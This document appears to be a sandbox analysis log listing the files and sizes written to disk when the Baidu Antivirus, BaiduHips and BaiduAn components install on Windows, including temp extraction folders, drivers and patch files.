    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\百度杀毒.lnk (907 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (16424 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (2392 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (132336 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (8 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
    %System%\drivers\bd0002.sys (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
    %System%\config\SYSTEM.LOG (5938 bytes)
    %System%\drivers\bd0001.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (32128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (1552 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\卸载百度杀毒.lnk (880 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (32128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (528 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (593 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (580 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (58402 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (30968 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (2 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (19592 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (19152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (1552 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (6360 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (9320 bytes)
    %System%\drivers\BDArKit.sys (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (125 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (41699 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (13584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (36536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (15 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (12536 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (5520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (411 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (2392 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (1524 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (12536 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (5 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (1856 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (75 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (16288 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (33633 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (2392 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (8752 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (33536 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (58168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (938 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (7192 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (4992 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (66750 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (8 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (46488 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (23504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (21480 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (1704 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (13 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (33536 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (784 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (8184 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (16368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (33747 bytes)
    %Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000005.sst (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000004 (4 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\smr.dat (95096 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (1368 bytes)
    %System%\drivers\BDDefense.sys (601 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.1.xml (602 bytes)
    %WinDir%\Temp\Tar1B.tmp (2784 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (602 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_PreU_1.8.xml (619 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
    %WinDir%\Temp\Cab1A.tmp (56 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1724 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000005.sst (4 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000004 (4 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (602 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (619 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.3.xml (602 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (597 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (5873 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (3897 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (5873 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (112 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (7972 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (9098 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (7972 bytes)
    %WinDir%\Temp\Tar15.tmp (2784 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (8657 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
    %WinDir%\Temp\Cab14.tmp (56 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (4 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (3897 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1728 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (4 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (816 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys.tmp.bdl (11169 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\dnw.xml.tmp.bdl (245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bdt\fe56763bd610dbf0db84b6cd8b10202a.bdt (71 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerConfig.dat.bdl (1261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bdt\fb32afe4ccd37a3dbc2f8507075652b6.bdt (71 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\host.dat (306 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (14 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerXMLScript.dat.bdl (158 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (580 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (5230 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerLuaScript.dat.bdl (4154 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\p2pconfig.dat (64 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch10\hipsClient.xml.bdl (3394 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (8 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SWManager.rdb (25776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\CompatibilityChecker.dll (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSysFixerPlugin.dll (34186 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatchAgent.dll (3104 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDownload.dll (11496 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerLuaScript.dat (8184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnTray.exe (66168 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDConfig.dll (3073 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDArKit.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcher.dll (27704 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTips.rdb (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHips.exe (1856 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_product.xml (291 bytes)
